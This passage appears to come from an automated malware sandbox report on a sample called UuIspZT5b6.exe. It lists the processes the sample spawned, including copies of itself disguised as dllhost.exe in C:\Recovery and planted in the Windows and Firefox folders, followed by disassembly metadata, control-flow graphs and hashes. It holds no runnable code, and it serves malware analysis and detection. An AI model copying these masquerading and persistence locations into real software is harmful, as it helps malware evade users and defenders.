                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:46
                                                  Start time:01:37:20
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff693ab0000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:47
                                                  Start time:01:37:22
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\dllhost.exe"
                                                  Imagebase:0xd50000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:51
                                                  Start time:01:37:26
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\dllhost.exe"
                                                  Imagebase:0x980000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:52
                                                  Start time:01:37:36
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                                                  Imagebase:0x850000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:53
                                                  Start time:01:37:45
                                                  Start date:01/08/2024
                                                  Path:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                                                  Imagebase:0x4c0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:54
                                                  Start time:01:37:53
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\UuIspZT5b6.exe"
                                                  Imagebase:0xa50000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:55
                                                  Start time:01:38:01
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\dllhost.exe"
                                                  Imagebase:0x8b0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:11.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0
                                                    execution_graph 9102 7ffd9bc70aa1 9103 7ffd9bc70abf QueryFullProcessImageNameA 9102->9103 9105 7ffd9bc70c64 9103->9105

                                                    Executed Functions

                                                    Function 00007FFD9B8993A0 Relevance: 1.2, Instructions: 1190COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f1fa6ce84ab4be89259605ea4d4ecba3056871008b354668b459c54ef0fc57a
                                                    • Instruction ID: a97539965c8b674f71ae4656928e0680e3a820f26cc3c03f7568202884007c6f
                                                    • Opcode Fuzzy Hash: 7f1fa6ce84ab4be89259605ea4d4ecba3056871008b354668b459c54ef0fc57a
                                                    • Instruction Fuzzy Hash: EE823A30B0D90D8FEB68EB58886967877D1FF98311F1506B9D45EC73A2DE28AD428781
                                                    Function 00007FFD9BC6010F Relevance: .7, Instructions: 693COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 356 7ffd9bc6010f-7ffd9bc60122 357 7ffd9bc60124-7ffd9bc60465 356->357 358 7ffd9bc6016e-7ffd9bc60184 356->358 362 7ffd9bc6046f-7ffd9bc604ae 357->362 359 7ffd9bc60214-7ffd9bc60244 358->359 360 7ffd9bc6018a-7ffd9bc60192 358->360 372 7ffd9bc602ee-7ffd9bc602f7 359->372 373 7ffd9bc6024a-7ffd9bc6024b 359->373 360->362 363 7ffd9bc60198-7ffd9bc601aa 360->363 376 7ffd9bc604b0 362->376 363->362 365 7ffd9bc601b0-7ffd9bc601c7 363->365 366 7ffd9bc601c9-7ffd9bc601d0 365->366 367 7ffd9bc60207-7ffd9bc6020e 365->367 366->362 370 7ffd9bc601d6-7ffd9bc60204 366->370 367->359 367->360 370->367 374 7ffd9bc602fd-7ffd9bc60303 372->374 375 7ffd9bc6042f-7ffd9bc6043d 372->375 377 7ffd9bc6024e-7ffd9bc60264 373->377 374->362 380 7ffd9bc60309-7ffd9bc60318 374->380 378 7ffd9bc60444-7ffd9bc60455 375->378 379 7ffd9bc6043f 375->379 384 7ffd9bc604bb-7ffd9bc60551 376->384 377->362 381 7ffd9bc6026a-7ffd9bc6028e 377->381 379->378 382 7ffd9bc60422-7ffd9bc60429 380->382 383 7ffd9bc6031e-7ffd9bc60325 380->383 385 7ffd9bc602e1-7ffd9bc602e8 381->385 386 7ffd9bc60290-7ffd9bc602b3 381->386 382->374 382->375 383->362 387 7ffd9bc6032b-7ffd9bc60335 383->387 393 7ffd9bc6055c-7ffd9bc6059f 384->393 394 7ffd9bc604d6-7ffd9bc60556 384->394 385->372 385->377 386->362 391 7ffd9bc602b9-7ffd9bc602df 386->391 392 7ffd9bc6033c-7ffd9bc60347 387->392 391->385 391->386 395 7ffd9bc60349-7ffd9bc60360 392->395 396 7ffd9bc60386-7ffd9bc60395 392->396 402 7ffd9bc605a1-7ffd9bc605f6 393->402 394->393 405 7ffd9bc604f8-7ffd9bc60558 394->405 395->362 400 7ffd9bc60366-7ffd9bc60382 395->400 396->362 401 7ffd9bc6039b-7ffd9bc603bf 396->401 400->395 403 7ffd9bc60384 400->403 404 7ffd9bc603c2-7ffd9bc603df 401->404 419 7ffd9bc60601-7ffd9bc606a7 402->419 408 7ffd9bc60402-7ffd9bc60418 403->408 404->362 409 7ffd9bc603e5-7ffd9bc60400 404->409 405->393 412 7ffd9bc6051c-7ffd9bc6055a 405->412 408->362 411 7ffd9bc6041a-7ffd9bc6041e 408->411 409->404 409->408 411->382 412->393 417 7ffd9bc6053d-7ffd9bc60550 412->417 430 7ffd9bc606ad-7ffd9bc60a50 419->430 431 7ffd9bc607d7-7ffd9bc607f4 419->431 439 7ffd9bc60abe-7ffd9bc60ad8 430->439 432 7ffd9bc60b01-7ffd9bc60b1a 431->432 433 7ffd9bc607fa-7ffd9bc607ff 431->433 435 7ffd9bc60802-7ffd9bc60809 433->435 437 7ffd9bc6078c-7ffd9bc60af9 435->437 438 7ffd9bc6080b-7ffd9bc6080f 435->438 437->432 438->402 441 7ffd9bc60815 438->441 442 7ffd9bc60893-7ffd9bc60896 441->442 443 7ffd9bc60899-7ffd9bc608a0 442->443 444 7ffd9bc608a6 443->444 445 7ffd9bc60817-7ffd9bc6084c call 7ffd9bc604a0 443->445 446 7ffd9bc60916-7ffd9bc6091d 444->446 445->432 453 7ffd9bc60852-7ffd9bc60862 445->453 448 7ffd9bc6091f-7ffd9bc60965 446->448 449 7ffd9bc608a8-7ffd9bc608da call 7ffd9bc604a0 446->449 464 7ffd9bc60734-7ffd9bc60738 448->464 465 7ffd9bc6096b-7ffd9bc60970 448->465 449->432 456 7ffd9bc608e0-7ffd9bc60908 449->456 453->402 455 7ffd9bc60868-7ffd9bc60885 453->455 455->432 458 7ffd9bc6088b-7ffd9bc60890 455->458 456->432 459 7ffd9bc6090e-7ffd9bc60913 456->459 458->442 459->446 467 7ffd9bc6078a 464->467 468 7ffd9bc6073a-7ffd9bc60757 464->468 466 7ffd9bc609f6-7ffd9bc609fa 465->466 469 7ffd9bc60a00-7ffd9bc60a06 466->469 470 7ffd9bc60975-7ffd9bc609a4 call 7ffd9bc604a0 466->470 467->435 468->439 470->432 473 7ffd9bc609aa-7ffd9bc609ba 470->473 473->419 474 7ffd9bc609c0-7ffd9bc609cf 473->474 474->432 475 7ffd9bc609d5-7ffd9bc609e8 474->475 475->443 476 7ffd9bc609ee-7ffd9bc609f3 475->476 476->466
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 393e45906abe912c40c201d5fce73e4aefd740e91245cd9eefeeff007480ff63
                                                    • Instruction ID: bba0494a7c094db9a86b0025fc8b01f88dff3bfbf5972c58d6a84ae898d24d17
                                                    • Opcode Fuzzy Hash: 393e45906abe912c40c201d5fce73e4aefd740e91245cd9eefeeff007480ff63
                                                    • Instruction Fuzzy Hash: 29429F30A1960ACFEB6DDF68D4E4AB877A1FF54300F5041BDD45ED729ADA38A981CB40
                                                    Function 00007FFD9BC6E9B1 Relevance: .5, Instructions: 518COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 621 7ffd9bc6e9b1-7ffd9bc6e9b7 622 7ffd9bc6ea0e-7ffd9bc6ea22 call 7ffd9bc6dbb0 621->622 623 7ffd9bc6e9b9-7ffd9bc6e9c1 621->623 632 7ffd9bc6ebf0-7ffd9bc6ec55 call 7ffd9bc6cb68 622->632 633 7ffd9bc6ea28-7ffd9bc6ea2b 622->633 624 7ffd9bc6e9c3-7ffd9bc6e9dd 623->624 625 7ffd9bc6e9df 623->625 627 7ffd9bc6e9e4-7ffd9bc6e9e6 624->627 625->627 630 7ffd9bc6e9f1-7ffd9bc6e9f4 627->630 631 7ffd9bc6e9e8-7ffd9bc6e9ec 627->631 635 7ffd9bc6ed03-7ffd9bc6ed06 630->635 636 7ffd9bc6e9fa-7ffd9bc6ea03 630->636 634 7ffd9bc6ef44-7ffd9bc6ef52 631->634 688 7ffd9bc6ec5c-7ffd9bc6ec5d 632->688 633->632 637 7ffd9bc6ea31-7ffd9bc6ea4b 633->637 641 7ffd9bc6ee23-7ffd9bc6ee26 635->641 642 7ffd9bc6ed0c-7ffd9bc6ed67 call 7ffd9bc6cb68 call 7ffd9bc6cb18 635->642 638 7ffd9bc6ef40-7ffd9bc6ef41 636->638 639 7ffd9bc6ea09-7ffd9bc6ea0a 636->639 646 7ffd9bc6ea73-7ffd9bc6ea8f 637->646 647 7ffd9bc6ea4d 637->647 638->634 639->622 641->638 644 7ffd9bc6ee2c-7ffd9bc6ee8f call 7ffd9bc6caf0 call 7ffd9bc6d790 call 7ffd9bc6cb18 641->644 689 7ffd9bc6ed8f-7ffd9bc6ed97 642->689 690 7ffd9bc6ed69-7ffd9bc6ed8e call 7ffd9bc6cb40 642->690 692 7ffd9bc6ee91-7ffd9bc6eeb6 call 7ffd9bc6cb40 644->692 693 7ffd9bc6eeb7-7ffd9bc6eedc 644->693 650 7ffd9bc6ea52-7ffd9bc6ea54 646->650 647->650 653 7ffd9bc6ea9a-7ffd9bc6eb04 call 7ffd9bc6d790 call 7ffd9bc6cb68 call 7ffd9bc6cb90 650->653 654 7ffd9bc6ea56-7ffd9bc6ea96 call 7ffd9bc6cc38 650->654 708 7ffd9bc6eb0a-7ffd9bc6eb4e call 7ffd9bc6e5d0 653->708 709 7ffd9bc6ebe5-7ffd9bc6ebe9 653->709 654->647 680 7ffd9bc6ea98 654->680 680->646 695 7ffd9bc6ec60-7ffd9bc6ec88 688->695 697 7ffd9bc6ed9a-7ffd9bc6edb6 689->697 690->689 692->693 713 7ffd9bc6eef2-7ffd9bc6eef5 693->713 714 7ffd9bc6eede 693->714 716 7ffd9bc6ec9e-7ffd9bc6ecdf 695->716 717 7ffd9bc6ec8a-7ffd9bc6ec9c 695->717 726 7ffd9bc6edb8-7ffd9bc6ee0f 697->726 735 7ffd9bc6eb54-7ffd9bc6ebbf call 7ffd9bc6caf0 call 7ffd9bc6d8e0 call 7ffd9bc6cb18 708->735 736 7ffd9bc6ebeb 708->736 709->695 721 7ffd9bc6eedf-7ffd9bc6eef0 713->721 722 7ffd9bc6eef6-7ffd9bc6ef34 713->722 714->721 742 7ffd9bc6ece1-7ffd9bc6ecef 716->742 743 7ffd9bc6ecf2-7ffd9bc6ecf8 716->743 717->716 721->713 722->638 746 7ffd9bc6ef36-7ffd9bc6ef3f 722->746 726->638 753 7ffd9bc6ee15-7ffd9bc6ee1e 726->753 735->709 761 7ffd9bc6ebc1-7ffd9bc6ebe0 call 7ffd9bc6cb40 735->761 736->632 742->743 743->639 747 7ffd9bc6ecfe 743->747 746->638 747->638 753->638 761->709
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 540dd54f1e9b59e91d2378a2e51edb065e6aba8914cd6f79ccb15e2a01c1f4ae
                                                    • Instruction ID: 4ccb1d6010dd85e1b15faa0bbb7ee1fa43ff10d11b639ec3157983345508575e
                                                    • Opcode Fuzzy Hash: 540dd54f1e9b59e91d2378a2e51edb065e6aba8914cd6f79ccb15e2a01c1f4ae
                                                    • Instruction Fuzzy Hash: 2F028471B1995F8FEBA8F7A884B9ABC77D1FFA8310F15017AE00DC31A6DD2869418741
                                                    Function 00007FFD9B890D78 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7854967a34f2e1e3cb29fd120b248682142488856e280a8c9ef6d207756567b0
                                                    • Instruction ID: f2c5732502415162c7220dfbe8f5fa66e674024e0b14586f2ef04a34a1b8e5a6
                                                    • Opcode Fuzzy Hash: 7854967a34f2e1e3cb29fd120b248682142488856e280a8c9ef6d207756567b0
                                                    • Instruction Fuzzy Hash: B691C171A1CA9D8FDB89EB6C8C697A9BFE1FB69300F4001BAE049C72D6DB781451C741
                                                    Function 00007FFD9BC70AA1 Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID: FullImageNameProcessQuery
                                                    • String ID:
                                                    • API String ID: 3578328331-0
                                                    • Opcode ID: e691f29cced01871e4ce2cc7b82c076e95ba58e336e8ab39b5a62480fa023f3a
                                                    • Instruction ID: 5114e7a4ef6320282e09c5e5aeb73adc32984306eef47896cacaf302a64d99d5
                                                    • Opcode Fuzzy Hash: e691f29cced01871e4ce2cc7b82c076e95ba58e336e8ab39b5a62480fa023f3a
                                                    • Instruction Fuzzy Hash: 8081A270608A8C8FDB69DF68C8967F937E1FF58311F14427EE84EC7292CA7499458B81
                                                    Function 00007FFD9B890908 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction ID: 6b0d3857097c0c39b3b21018850544af27ca86e0bd93f3b5fbe0ec2a6bffd228
                                                    • Opcode Fuzzy Hash: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction Fuzzy Hash: F221E63130D9184FEB68EB4CE889EB977D1FB4932131501BAE58EC7136E911EC8287C1
                                                    Function 00007FFD9B890998 Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ccfbd9500acab236fb6280514d24a9b8d0321a8dc7efde1836e334972e45f04
                                                    • Instruction ID: 72ca44bf0f7a82fe1833e906de3a442833383962be6678e76bc95e0e0a65a521
                                                    • Opcode Fuzzy Hash: 6ccfbd9500acab236fb6280514d24a9b8d0321a8dc7efde1836e334972e45f04
                                                    • Instruction Fuzzy Hash: 53210820B1D91D4FEB68B76C986E67976C6DB9C315B0100B9F40EC32E7DD28AC414281
                                                    Function 00007FFD9B890C25 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 058b71b8c6b06718eebd70d4aa43f026c5b6eee17880f114bc156a0064becc91
                                                    • Instruction ID: 0eb1816e4859b014fe76b079af624b1a3b2b5f87deda55050c2cb8d8501ee90a
                                                    • Opcode Fuzzy Hash: 058b71b8c6b06718eebd70d4aa43f026c5b6eee17880f114bc156a0064becc91
                                                    • Instruction Fuzzy Hash: 29213736B0D25D8FEB16A7A8AC250DC7F60EF46324F0541F3D1588B1D3D93826469791
                                                    Function 00007FFD9B892801 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc0722374dd7f5d32cb27ceb74a72b4a1964e038f7fcb67f34eab1821c160cae
                                                    • Instruction ID: 8363ff0c8168b5caa863c0ec1a8c88efa1fd40ada2eb302dae809357072695f7
                                                    • Opcode Fuzzy Hash: dc0722374dd7f5d32cb27ceb74a72b4a1964e038f7fcb67f34eab1821c160cae
                                                    • Instruction Fuzzy Hash: C1118131B1D90E4BEFA8EBD898A16FC7691FF4C311F410176C40EE32A2DE28AA458740
                                                    Function 00007FFD9B8908F8 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction ID: 4a68c82410f867bffd8e045ff540c6ca1fe90de9d113405a1f11985fa32cb7d3
                                                    • Opcode Fuzzy Hash: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction Fuzzy Hash: 28012432B0E92C0B9A38925D984A939B7C2EBDAA303561239D88EC3265CC10BC0343C4
                                                    Function 00007FFD9B890C38 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c271fe590096c6607e1ba8072ec05b87dd668dc87e306a04fe7f028d7863117
                                                    • Instruction ID: 776413dbcdf361e859ed4126dd996fe4202a5aa6722317317a869c86bb918d17
                                                    • Opcode Fuzzy Hash: 1c271fe590096c6607e1ba8072ec05b87dd668dc87e306a04fe7f028d7863117
                                                    • Instruction Fuzzy Hash: 6811C235B1E28D8FEB12DBB8986419C7FB0EF56714F0644F7C094DB2A2D53827498790
                                                    Function 00007FFD9B890C40 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1f8d1fb934d47c1e3eba8225660d14dfd192ce3456f10cc435a0ab8a61a6eed
                                                    • Instruction ID: b7756bb0709f97f274fa18c8e81a7481ea5173687f4e3b7c945522ae8314e0a2
                                                    • Opcode Fuzzy Hash: b1f8d1fb934d47c1e3eba8225660d14dfd192ce3456f10cc435a0ab8a61a6eed
                                                    • Instruction Fuzzy Hash: 4011AD35A1E28D8FEB12DBB4886419C7FB0EF56714F0641F7D494DB2A2D9382B498790
                                                    Function 00007FFD9B8928A9 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction ID: 551839c90e453559f3579b80c777a3c1b08797269cf072de5c7e795eeb843971
                                                    • Opcode Fuzzy Hash: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction Fuzzy Hash: A2018F21B1A50E8BEF68EBE8C4A46B82792EF98351F024175D40ED32F6DD29AA418740
                                                    Function 00007FFD9B890C48 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction ID: b6240e9690ef3028b9ffe91f849d668afec13e87a95ae2d3c21249b547c8fee2
                                                    • Opcode Fuzzy Hash: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction Fuzzy Hash: 2B018C35A1E28D8FEB16DBB488641987FB0EF46714F1641F7D054DB2A6D9386B48C780
                                                    Function 00007FFD9B894EBD Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3b23bbc7b9ae0e315be927441fc649263978d011d2bc4341b381c15b388a197
                                                    • Instruction ID: 2281012130666b0c53fab0de0c26fe271cc7e2cc4b92c407ed23dd23a8137760
                                                    • Opcode Fuzzy Hash: c3b23bbc7b9ae0e315be927441fc649263978d011d2bc4341b381c15b388a197
                                                    • Instruction Fuzzy Hash: 3D012C3590CA59CFCB55EB18C895A9977F1FB6C310F45069AD409D72A1DB34AE41CF80
                                                    Function 00007FFD9B890C50 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction ID: d36249f8b8b8cfcbd95815f1244933d8a273a63c587a6b87793ec0b606a5f5c0
                                                    • Opcode Fuzzy Hash: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction Fuzzy Hash: 33015A34A1E2898FEB16DBA488A41987FB0EF16704F1641E7D454DB2A6D9386B448741
                                                    Function 00007FFD9B89291E Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 46210ba721b55378ddd7f3797381cbcb531c8190a2683e15068ceb93a91e0b4c
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: E2F03130B1A50E8BEF79EB94C8A47F87761EB58311F1141B9C40EA22A1DE386A84CB40
                                                    Function 00007FFD9B890B77 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction ID: 206be18c23f38dd525a492dab24fa65cb5314288f6118ac102f33633d90ccd54
                                                    • Opcode Fuzzy Hash: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
